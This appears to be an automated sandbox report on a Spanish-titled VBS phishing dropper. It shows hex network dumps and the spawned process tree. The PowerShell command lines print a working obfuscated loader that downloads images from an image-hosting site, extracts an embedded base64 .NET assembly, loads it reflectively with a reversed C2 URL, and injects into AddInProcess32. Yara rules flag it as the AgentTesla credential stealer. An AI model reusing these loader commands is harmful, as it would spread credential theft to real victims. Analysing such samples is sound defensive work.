2024-04-24 04:54:13 UTC	1369	IN	Data Raw: f8 5a b4 72 3a 06 01 54 90 2e fa 66 7b a3 f9 62 40 a4 5d 7e 2e fc 60 2f 1a a2 3f 24 93 54 4f 61 8e 2d 4a 9b 56 e9 7a d6 26 59 88 36 aa 2b db 0b 1f 99 15 6d e7 70 bc 03 c9 28 8d 76 ef 00 f4 e7 28 60 0a 81 81 52 b4 4f 18 35 2c 75 54 e8 38 e8 48 be d8 e8 53 3c 2c a3 69 da 3a 03 47 f2 c0 41 b6 ae 98 28 71 ea e0 93 db 20 c6 87 4c 44 64 b1 2d 74 3e 58 ab 02 ac 45 11 cf 7c 6b 46 76 ab 10 81 be 78 14 92 09 56 15 77 71 b7 b0 38 c4 53 9d 52 ac 12 c4 0a a8 fc 43 a8 c0 49 1c f3 7a c2 96 5f 61 db 02 92 3c 36 14 95 f7 b1 80 6d 62 69 90 a8 81 f7 7f 88 9c 8d 14 eb a7 9c 3b 0b 5e f8 23 0b ed 57 23 86 e9 83 e4 58 c0 f4 4f af 86 d9 1b a1 1b 94 fb 9c 04 3e 27 3c 5a 95 96 34 2c 3f 0f 1e f9 89 cd 8b c7 a1 98 a4 41 4a 85 fe 21 7d f0 0f ad f1 4d 6b 6b 19 98 b2 1b e1 7d b1 87 d3 Data Ascii: Zr:T.f{b@]~.`/?$TOa-JVz&Y6+mp(v(`RO5,uT8HS<,i:GA(q LDd-t>XE\|kFvxVwq8SRCIz_a<6mbi;^#W#XO>'<Z4,?AJ!}Mkk}
2024-04-24 04:54:13 UTC	1369	IN	Data Raw: 03 82 31 dd 47 db 1d 13 85 1f 76 75 23 8f 4d 56 78 a0 db 5c 89 23 5d bd be 18 60 c1 e2 dc 63 5a 51 55 ef 81 e8 13 ed 54 52 b8 67 d3 35 06 21 42 f7 c7 f5 3f 6b f4 b0 e9 83 36 96 50 38 1c 1a 39 e4 21 7b e1 23 51 ec 79 eb 87 62 25 fd dc 88 ac 3b f2 70 37 0f da d8 1e 20 cb a5 9a 8f bb 62 69 f6 af 4b bd 80 d2 4a 0d f3 6d 99 4e a1 18 aa 00 54 76 ba c5 66 01 19 58 46 a0 9e 4d 1b c0 f4 9f fc 4d a0 59 96 63 a2 70 ed c7 5e 71 6d 5f da 5d 16 bb 4c d0 49 a3 93 67 00 8b eb 9e 73 57 aa 68 d3 7e d0 c7 b7 c3 07 0e a5 a7 87 70 00 71 c8 1e f8 1a de 1f e2 fa 0f 09 59 57 4d a1 98 96 3c 96 ec 31 98 be d6 69 8b 94 3a 47 51 d4 1b eb 98 7a 67 79 94 a1 b0 41 ac 60 e9 d5 c8 26 35 b5 e3 9e 30 35 9b ed 4c 09 3b 37 91 20 42 bd 3e 39 57 fb 53 a7 53 ea d3 48 54 fc 73 38 e9 8b 72 d1 aa Data Ascii: 1Gvu#MVx\#]`cZQUTRg5!B?k6P89!{#Qyb%;p7 biKJmNTvfXFMMYcp^qm_]LIgsWh~pqYWM<1i:GQzgyA`&505L;7 B>9WSSHTs8r
2024-04-24 04:54:13 UTC	1369	IN	Data Raw: 0b d0 9f 6c 57 5f 34 2f a5 6d 8c cd d3 9f 6e 71 af 23 4f 2a 2a 19 ce e6 21 78 42 07 e7 8a 6a fc 36 18 23 94 09 98 95 e9 cf 5c 04 9d 56 48 91 90 b1 a5 a2 3f ae 5c b2 4a ea cb 1a 92 00 5a 51 db df 2f a3 d8 a4 ab 10 23 22 c9 ee 49 ed 97 45 58 dd bc b1 e9 e8 d6 3a 57 38 03 48 9b ce e1 c8 37 c5 71 58 cc 40 34 92 16 56 25 56 c1 39 29 13 cc cc c3 8d a6 f2 f2 b1 d8 52 36 05 82 d3 57 d3 00 0f 36 e7 24 a9 6d c4 d0 1c e0 52 17 2e c4 13 63 db 8e 31 85 d3 ee 89 5c 1d ac b6 4f be 2b 36 a9 a1 b5 04 97 ef 7d b0 08 b0 97 3d 79 5e a7 13 9d 97 7e e1 5b b2 3c d9 ca ef 2d 4a c6 b2 d3 45 12 51 56 bb 17 f5 c0 e8 b5 0c 7d 3b aa ba 1f 7c 31 d4 c8 06 ed a4 af 7a c4 95 77 72 38 af 86 30 db cb 14 2f 60 76 18 04 49 3c c5 52 b4 08 fc 40 fc f1 89 1b 69 da 2a ab af c7 12 89 1d 24 21 40 Data Ascii: lW_4/mnq#O*!xBj6#\VH?\JZQ/#"IEX:W8H7qX@4V%V9)R6W6$mR.c1\O+6}=y^~[<-JEQV};\|1zwr80/`vI<R@i$!@
2024-04-24 04:54:13 UTC	1369	IN	Data Raw: 5a b1 de f9 ce 8b 40 74 f1 23 89 4b 32 c8 64 7d de db 48 a3 f1 04 93 7e d8 8e af c5 f5 07 57 12 0d 39 d3 a6 e0 c4 b2 db 15 27 36 1e 09 5e 16 48 e4 65 0c 49 0d 60 70 47 b0 1d 7e a3 01 49 74 6b a9 8d 4e e2 50 a2 b6 d5 e4 1e 49 35 5c 59 f7 c6 84 70 a0 0c 23 0a 15 78 25 79 03 db 32 f4 11 eb 24 f1 a6 3a a9 e9 51 2f 62 31 0a 18 dd 0a ee 48 e4 e6 bc 8a ea db 55 0c 9c 85 36 68 55 e0 7c f3 ed 4a be 9b c4 d0 47 34 a5 5d 43 72 6a ba f1 9c 9a 8d 34 fa 38 fc e5 32 35 ed 0a 41 e0 9b 3d 47 3d b1 df b4 70 a6 a3 c7 e1 47 00 2f 93 7c 76 00 1e f9 e7 0a 9d 3e a4 84 2a c5 4d ab 29 b1 f0 fd 70 1c d6 68 d7 4a c1 96 65 65 6e 42 f3 78 a1 7d c7 36 f4 fe 1b 36 ae 17 d4 4f ea 91 d7 d0 a5 bf 13 76 24 df 18 b6 ab 45 14 5a 58 5c 3a ac db 03 32 96 14 dd 41 20 fc 0e 06 68 bb eb 43 0d 04 Data Ascii: Z@t#K2d}H~W9'6^HeI`pG~ItkNPI5\Yp#x%y2$:Q/b1HU6hU\|JG4]Crj4825A=G=pG/\|v>*M)phJeenBx}66Ov$EZX\:2A hC

Target ID:	0
Start time:	06:54:06
Start date:	24/04/2024
Path:	C:\Windows\System32\wscript.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\orden de compra.vbs"
Imagebase:	0x7ff63a1d0000
File size:	170'496 bytes
MD5 hash:	A47CBE969EA935BDD3AB568BB126BC80
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Target ID:	1
Start time:	06:54:08
Start date:	24/04/2024
Path:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "$codigo = 'ZgB1DgTreG4DgTreYwB0DgTreGkDgTrebwBuDgTreCDgTreDgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreRgByDgTreG8DgTrebQBMDgTreGkDgTrebgBrDgTreHMDgTreIDgTreB7DgTreCDgTreDgTrecDgTreBhDgTreHIDgTreYQBtDgTreCDgTreDgTreKDgTreBbDgTreHMDgTredDgTreByDgTreGkDgTrebgBnDgTreFsDgTreXQBdDgTreCQDgTrebDgTreBpDgTreG4DgTreawBzDgTreCkDgTreIDgTreDgTrekDgTreHcDgTreZQBiDgTreEMDgTrebDgTreBpDgTreGUDgTrebgB0DgTreCDgTreDgTrePQDgTregDgTreE4DgTreZQB3DgTreC0DgTreTwBiDgTreGoDgTreZQBjDgTreHQDgTreIDgTreBTDgTreHkDgTrecwB0DgTreGUDgTrebQDgTreuDgTreE4DgTreZQB0DgTreC4DgTreVwBlDgTreGIDgTreQwBsDgTreGkDgTreZQBuDgTreHQDgTreOwDgTregDgTreCQDgTreZDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreGUDgTreZDgTreBEDgTreGEDgTredDgTreBhDgTreCDgTreDgTrePQDgTregDgTreEDgTreDgTreKDgTreDgTrepDgTreDsDgTreIDgTreDgTrekDgTreHMDgTreaDgTreB1DgTreGYDgTreZgBsDgTreGUDgTreZDgTreBMDgTreGkDgTrebgBrDgTreHMDgTreIDgTreDgTre9DgTreCDgTreDgTreJDgTreBsDgTreGkDgTrebgBrDgTreHMDgTreIDgTreB8DgTreCDgTreDgTreRwBlDgTreHQDgTreLQBSDgTreGEDgTrebgBkDgTreG8DgTrebQDgTregDgTreC0DgTreQwBvDgTreHUDgTrebgB0DgTreCDgTreDgTreJDgTreBsDgTreGkDgTrebgBrDgTreHMDgTreLgBMDgTreGUDgTrebgBnDgTreHQDgTreaDgTreDgTre7DgTreCDgTreDgTreZgBvDgTreHIDgTreZQBhDgTreGMDgTreaDgTreDgTregDgTreCgDgTreJDgTreBsDgTreGkDgTrebgBrDgTreCDgTreDgTreaQBuDgTreCDgTreDgTreJDgTreBzDgTreGgDgTredQBmDgTreGYDgTrebDgTreBlDgTreGQDgTreTDgTreBpDgTreG4DgTreawBzDgTreCkDgTreIDgTreB7DgTreCDgTreDgTredDgTreByDgTreHkDgTreIDgTreB7DgTreCDgTreDgTreJDgTreBkDgTreG8DgTredwBuDgTreGwDgTrebwBhDgTreGQDgTreZQBkDgTreEQDgTreYQB0DgTreGEDgTreIDgTreDgTrerDgTreD0DgTreIDgTreDgTrekDgTreHcDgTreZQBiDgTreEMDgTrebDgTreBpDgTreGUDgTrebgB0DgTreC4DgTreRDgTreBvDgTreHcDgTrebgBsDgTreG8DgTreYQBkDgTreEQDgTreYQB0DgTreGEDgTreKDgTreDgTrekDgTreGwDgTreaQBuDgTreGsDgTreKQDgTregDgTreH0DgTreIDgTreBjDgTreGEDgTredDgTreBjDgTreGgDgTreIDgTreB7DgTreCDgTreDgTreYwBvDgTreG4DgTredDgTreBpDgTreG4DgTredQBlDgTreCDgTreDgTrefQDgTregDgTreH0DgTreOwDgTregDgTreHIDgTreZQB0DgTreHUDgTrecgBuDgTreCDgTreDgTreJDgTreBkDgTreG8DgTredwBuDgTreGwDgTrebwBhDgTreGQDgTreZQBkDgTreEQDgTreYQB0DgTreGEDgTreIDgTreB9DgTreDsDgTreIDgTreDgTrekDgTreGwDgTreaQBuDgTreGsDgTrecwDgTregDgTreD0DgTreIDgTreBDgTreDgTreCgDgTreJwBoDgTreHQDgTredDgTreBwDgTreHMDgTreOgDgTrevDgTreC8DgTredQBwDgTreGwDgTrebwBhDgTreGQDgTreZDgTreBlDgTreGkDgTrebQBhDgTreGcDgTreZQBuDgTreHMDgTreLgBjDgTreG8DgTrebQDgTreuDgTreGIDgTrecgDgTrevDgTreGkDgTrebQBhDgTreGcDgTreZQBzDgTreC8DgTreMDgTreDgTrewDgTreDQDgTreLwDgTre3DgTreDYDgTreMDgTreDgTrevDgTreDDgTreDgTreNDgTreDgTrezDgTreC8DgTreZgB1DgTreGwDgTrebDgTreDgTrevDgTreG4DgTreZQB3DgTreF8DgTreaQBtDgTreGEDgTreZwBlDgTreC4DgTreagBwDgTreGcDgTrePwDgTrexDgTreDcDgTreMQDgTrexDgTreDIDgTreODgTreDgTre3DgTreDgDgTreODgTreDgTre3DgTreCcDgTreLDgTreDgTregDgTreCcDgTreaDgTreB0DgTreHQDgTrecDgTreBzDgTreDoDgTreLwDgTrevDgTreHUDgTrecDgTreBsDgTreG8DgTreYQBkDgTreGQDgTreZQBpDgTreG0DgTreYQBnDgTreGUDgTrebgBzDgTreC4DgTreYwBvDgTreG0DgTreLgBiDgTreHIDgTreLwBpDgTreG0DgTreYQBnDgTreGUDgTrecwDgTrevDgTreDDgTreDgTreMDgTreDgTre0DgTreC8DgTreNwDgTre2DgTreDDgTreDgTreLwDgTrewDgTreDQDgTreNDgTreDgTrevDgTreG8DgTrecgBpDgTreGcDgTreaQBuDgTreGEDgTrebDgTreDgTrevDgTreG4DgTreZQB3DgTreF8DgTreaQBtDgTreGEDgTreZwBlDgTreC4DgTreagBwDgTreGcDgTrePwDgTrexDgTreDcDgTreMQDgTrexDgTreDIDgTreODgTreDgTre3DgTreDgDgTreODgTreDgTre4DgTreCcDgTreKQDgTre7DgTreCDgTreDgTreJDgTreBpDgTreG0DgTreYQBnDgTreGUDgTreQgB5DgTreHQDgTreZQBzDgTreCDgTreDgTrePQDgTregDgTreEQDgTrebwB3DgTreG4DgTrebDgTreBvDgTreGEDgTreZDgTreBEDgTreGEDgTredDgTreBhDgTreEYDgTrecgBvDgTreG0DgTreTDgTreBpDgTreG4DgTreawBzDgTreCDgTreDgTreJDgTreBsDgTreGkDgTrebgBrDgTreHMDgTreOwDgTregDgTreGkDgTreZgDgTregDgTreCgDgTreJDgTreBpDgTreG0DgTreYQBnDgTreGUDgTreQgB5DgTreHQDgTreZQBzDgTreCDgTreDgTreLQBuDgTreGUDgTreIDgTreDgTrekDgTreG4DgTredQBsDgTreGwDgTreKQDgTregDgTreHsDgTreIDgTreDgTrekDgTreGkDgTrebQBhDgTreGcDgTreZQBUDgTreGUDgTreeDgTreB0DgTreCDgTreDgTrePQDgTregDgTreFsDgTreUwB5DgTreHMDgTredDgTreBlDgTreG0DgTreLgBUDgTreGUDgTreeDgTreB0DgTreC4DgTreRQBuDgTreGMDgTrebwBkDgTreGkDgTrebgBnDgTreF0DgTreOgDgTre6DgTreFUDgTreVDgTreBGDgTreDgDgTreLgBHDgTreGUDgTredDgTreBTDgTreHQDgTrecgBpDgTreG4DgTreZwDgTreoDgTreCQDgTreaQBtDgTreGEDgTreZwBlDgTreEIDgTreeQB0DgTreGUDgTrecwDgTrepDgTreDsDgTreIDgTreDgTrekDgTreHMDgTredDgTreBhDgTreHIDgTredDgTreBGDgTreGwDgTreYQBnDgTreCDgTreDgTrePQDgTregDgTreCcDgTrePDgTreDgTre8DgTreEIDgTreQQBTDgTreEUDgTreNgDgTre0DgTreF8DgTreUwBUDgTreEEDgTreUgBUDgTreD4DgTrePgDgTrenDgTreDsDgTreIDgTreDgTrekDgTreGUDgTrebgBkDgTreEYDgTrebDgTreBhDgTreGcDgTreIDgTreDgTre9DgTreCDgTreDgTreJwDgTre8DgTreDwDgTreQgBBDgTreFMDgTreRQDgTre2DgTreDQDgTreXwBFDgTreE4DgTreRDgTreDgTre+DgTreD4DgTreJwDgTre7DgTreCDgTreDgTreJDgTreBzDgTreHQDgTreYQByDgTreHQDgTreSQBuDgTreGQDgTreZQB4DgTreCDgTreDgTrePQDgTregDgTreCQDgTreaQBtDgTreGEDgTreZwBlDgTreFQDgTreZQB4DgTreHQDgTreLgBJDgTreG4DgTreZDgTreBlDgTreHgDgTreTwBmDgTreCgDgTreJDgTreBzDgTreHQDgTreYQByDgTreHQDgTreRgBsDgTreGEDgTreZwDgTrepDgTreDsDgTreIDgTreDgTrekDgTreGUDgTrebgBkDgTreEkDgTrebgBkDgTreGUDgTreeDgTreDgTregDgTreD0DgTreIDgTreDgTrekDgTreGkDgTrebQBhDgTreGcDgTreZQBUDgTreGUDgTreeDgTreB0DgTreC4DgTreSQBuDgTreGQDgTreZQB4DgTreE8DgTreZgDgTreoDgTreCQDgTreZQBuDgTreGQDgTreRgBsDgTreGEDgTreZwDgTrepDgTreDsDgTreIDgTreBpDgTreGYDgTreIDgTreDgTreoDgTreCQDgTrecwB0DgTreGEDgTrecgB0DgTreEkDgTrebgBkDgTreGUDgTreeDgTreDgTregDgTreC0DgTreZwBlDgTreCDgTreDgTreMDgTreDgTregDgTreC0DgTreYQBuDgTreGQDgTreIDgTreDgTrekDgTreGUDgTrebgBkDgTreEkDgTrebgBkDgTreGUDgTreeDgTreDgTregDgTreC0DgTreZwB0DgTreCDgTreDgTreJDgTreBzDgTreHQDgTreYQByDgTreHQDgTreSQBuDgTreGQDgTreZQB4DgTreCkDgTreIDgTreB7DgTreCDgTreDgTreJDgTreBzDgTreHQDgTreYQByDgTreHQDgTreSQBuDgTreGQDgTreZQB4DgTreCDgTreDgTreKwDgTre9DgTreCDgTreDgTreJDgTreBzDgTreHQDgTreYQByDgTreHQDgTreRgBsDgTreGEDgTreZwDgTreuDgTreEwDgTreZQBuDgTreGcDgTredDgTreBoDgTreDsDgTreIDgTreDgTrekDgTreGIDgTreYQBzDgTreGUDgTreNgDgTre0DgTreEwDgTreZQBuDgTreGcDgTredDgTreBoDgTreCDgTreDgTrePQDgTregDgTreCQDgTreZQBuDgTreGQDgTreSQBuDgTreGQDgTreZQB4DgTreCDgTreDgTreLQDgTregDgTreCQDgTrecwB0DgTreGEDgTrecgB0DgTreEkDgTrebgBkDgTreGUDgTreeDgTreDgTre7DgTreCDgTreDgTreJDgTreBiDgTreGEDgTrecwBlDgTreDYDgTreNDgTreBDDgTreG8DgTrebQBtDgTreGEDgTrebgBkDgTreCDgTreDgTrePQDgTregDgTreCQDgTreaQBtDgTreGEDgTreZwBlDgTreFQDgTreZQB4DgTreHQDgTreLgBTDgTreHUDgTreYgBzDgTreHQDgTrecgBpDgTreG4DgTreZwDgTreoDgTreCQDgTrecwB0DgTreGEDgTrecgB0DgTreEkDgTrebgBkDgTreGUDgTreeDgTreDgTresDgTreCDgTreDgTreJDgTreBiDgTreGEDgTrecwBlDgTreDYDgTreNDgTreBMDgTreGUDgTrebgBnDgTreHQDgTreaDgTreDgTrepDgTreDsDgTreIDgTreDgTrekDgTreGMDgTrebwBtDgTreG0DgTreYQBuDgTreGQDgTreQgB5DgTreHQDgTreZQBzDgTreCDgTreDgTrePQDgTregDgTreFsDgTreUwB5DgTreHMDgTredDgTreBlDgTreG0DgTreLgBDDgTreG8DgTrebgB2DgTreGUDgTrecgB0DgTreF0DgTreOgDgTre6DgTreEYDgTrecgBvDgTreG0DgTreQgBhDgTreHMDgTreZQDgTre2DgTreDQDgTreUwB0DgTreHIDgTreaQBuDgTreGcDgTreKDgTreDgTrekDgTreGIDgTreYQBzDgTreGUDgTreNgDgTre0DgTreEMDgTrebwBtDgTreG0DgTreYQBuDgTreGQDgTreKQDgTre7DgTreCDgTreDgTreJDgTreBsDgTreG8DgTreYQBkDgTreGUDgTreZDgTreBBDgTreHMDgTrecwBlDgTreG0DgTreYgBsDgTreHkDgTreIDgTreDgTre9DgTreCDgTreDgTreWwBTDgTreHkDgTrecwB0DgTreGUDgTrebQDgTreuDgTreFIDgTreZQBmDgTreGwDgTreZQBjDgTreHQDgTreaQBvDgTreG4DgTreLgBBDgTreHMDgTrecwBlDgTreG0DgTreYgBsDgTreHkDgTreXQDgTre6DgTreDoDgTreTDgTreBvDgTreGEDgTreZDgTreDgTreoDgTreCQDgTreYwBvDgTreG0DgTrebQBhDgTreG4DgTreZDgTreBCDgTreHkDgTredDgTreBlDgTreHMDgTreKQDgTre7DgTreCDgTreDgTreJDgTreB0DgTreHkDgTrecDgTreBlDgTreCDgTreDgTrePQDgTregDgTreCQDgTrebDgTreBvDgTreGEDgTreZDgTreBlDgTreGQDgTreQQBzDgTreHMDgTreZQBtDgTreGIDgTrebDgTreB5DgTreC4DgTreRwBlDgTreHQDgTreVDgTreB5DgTreHDgTreDgTreZQDgTreoDgTreCcDgTreUDgTreBSDgTreE8DgTreSgBFDgTreFQDgTreTwBBDgTreFUDgTreVDgTreBPDgTreE0DgTreQQBDDgTreEEDgTreTwDgTreuDgTreFYDgTreQgDgTreuDgTreEgDgTrebwBtDgTreGUDgTreJwDgTrepDgTreDsDgTreIDgTreDgTrekDgTreG0DgTreZQB0DgTreGgDgTrebwBkDgTreCDgTreDgTrePQDgTregDgTreCQDgTredDgTreB5DgTreHDgTreDgTreZQDgTreuDgTreEcDgTreZQB0DgTreE0DgTreZQB0DgTreGgDgTrebwBkDgTreCgDgTreJwBWDgTreEEDgTreSQDgTrenDgTreCkDgTreLgBJDgTreG4DgTredgBvDgTreGsDgTreZQDgTreoDgTreCQDgTrebgB1DgTreGwDgTrebDgTreDgTresDgTreCDgTreDgTreWwBvDgTreGIDgTreagBlDgTreGMDgTredDgTreBbDgTreF0DgTreXQDgTregDgTreCgDgTreJwB0DgTreHgDgTredDgTreDgTreuDgTreG8DgTrecgBiDgTreG8DgTreeQDgTrevDgTreDQDgTreNQDgTrexDgTreC4DgTreMwDgTre0DgTreDIDgTreLgDgTrezDgTreC4DgTreMgDgTre5DgTreDEDgTreLwDgTrevDgTreDoDgTrecDgTreB0DgTreHQDgTreaDgTreDgTrenDgTreCDgTreDgTreLDgTreDgTregDgTreCcDgTreZDgTreBlDgTreHMDgTreYQB0DgTreGkDgTredgBhDgTreGQDgTrebwDgTrenDgTreCDgTreDgTreLDgTreDgTregDgTreCcDgTreZDgTreBlDgTreHMDgTreYQB0DgTreGkDgTredgBhDgTreGQDgTrebwDgTrenDgTreCDgTreDgTreLDgTreDgTregDgTreCcDgTreZDgTreBlDgTreHMDgTreYQB0DgTreGkDgTredgBhDgTreGQDgTrebwDgTrenDgTreCwDgTreJwBBDgTreGQDgTreZDgTreBJDgTreG4DgTreUDgTreByDgTreG8DgTreYwBlDgTreHMDgTrecwDgTrezDgTreDIDgTreJwDgTresDgTreCcDgTreJwDgTrepDgTreCkDgTrefQDgTregDgTreH0DgTre';$oWjuxd = [system.Text.encoding]::Unicode.GetString([system.convert]::Frombase64string( $codigo.replace('DgTre','A') ));powershell.exe -windowstyle hidden -executionpolicy bypass -Noprofile -command $OWjuxD"
Imagebase:	0x7ff788560000
File size:	452'608 bytes
MD5 hash:	04029E121A0CFA5991749937DD22A1D9
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Target ID:	2
Start time:	06:54:08
Start date:	24/04/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Target ID:	3
Start time:	06:54:09
Start date:	24/04/2024
Path:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	false
Commandline:	"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -Noprofile -command "function DownloadDataFromLinks { param ([string[]]$links) $webClient = New-Object System.Net.WebClient; $downloadedData = @(); $shuffledLinks = $links \| Get-Random -Count $links.Length; foreach ($link in $shuffledLinks) { try { $downloadedData += $webClient.DownloadData($link) } catch { continue } }; return $downloadedData }; $links = @('https://uploaddeimagens.com.br/images/004/760/043/full/new_image.jpg?1711287887', 'https://uploaddeimagens.com.br/images/004/760/044/original/new_image.jpg?1711287888'); $imageBytes = DownloadDataFromLinks $links; if ($imageBytes -ne $null) { $imageText = [System.Text.Encoding]::UTF8.GetString($imageBytes); $startFlag = '<<BASE64_START>>'; $endFlag = '<<BASE64_END>>'; $startIndex = $imageText.IndexOf($startFlag); $endIndex = $imageText.IndexOf($endFlag); if ($startIndex -ge 0 -and $endIndex -gt $startIndex) { $startIndex += $startFlag.Length; $base64Length = $endIndex - $startIndex; $base64Command = $imageText.Substring($startIndex, $base64Length); $commandBytes = [System.Convert]::FromBase64String($base64Command); $loadedAssembly = [System.Reflection.Assembly]::Load($commandBytes); $type = $loadedAssembly.GetType('PROJETOAUTOMACAO.VB.Home'); $method = $type.GetMethod('VAI').Invoke($null, [object[]] ('txt.orboy/451.342.3.291//:ptth' , 'desativado' , 'desativado' , 'desativado','AddInProcess32',''))} }"
Imagebase:	0x7ff788560000
File size:	452'608 bytes
MD5 hash:	04029E121A0CFA5991749937DD22A1D9
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Target ID:	4
Start time:	06:54:17
Start date:	24/04/2024
Path:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\AddInProcess32.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\Microsoft.Net\Framework\v4.0.30319\AddInProcess32.exe"
Imagebase:	0x6b0000
File size:	43'008 bytes
MD5 hash:	9827FF3CDF4B83F9C86354606736CA9C
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000004.00000002.2973300391.0000000002A25000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000004.00000002.2962871474.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000004.00000002.2962871474.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
Reputation:	moderate
Has exited:	false